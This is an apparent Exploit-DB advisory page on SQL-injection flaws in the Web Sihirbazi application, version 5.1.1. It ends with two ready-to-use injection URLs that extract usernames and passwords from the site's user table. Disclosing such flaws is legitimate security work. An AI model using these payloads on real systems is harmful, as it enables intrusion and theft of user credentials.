Multiple SQL-injection vulnerabilities in Web Sihirbazi

vendor:

Web Sihirbazi

by:

N/A

CVSS

N/A

SQL-injection

CWE

Product Name: Web Sihirbazi

Affected Version From: 5.1.2001

Affected Version To:

Patch Exists:

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Multiple SQL-injection vulnerabilities in Web Sihirbazi

Web Sihirbazi is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Mitigation:

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/27031/info

Web Sihirbazi is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

These issues affect Web Sihirbazi 5.1.1; other versions may also be affected.

http://www.example.com/[script_path]/default.asp?page=news&id=-2+union+all+select+0,kullaniciadi,sifre,3+from+user http://www.example.com/[script_path]/default.asp?pageid=-7+union+all+select+0,1,2,kullaniciadi,sifre,5+from+user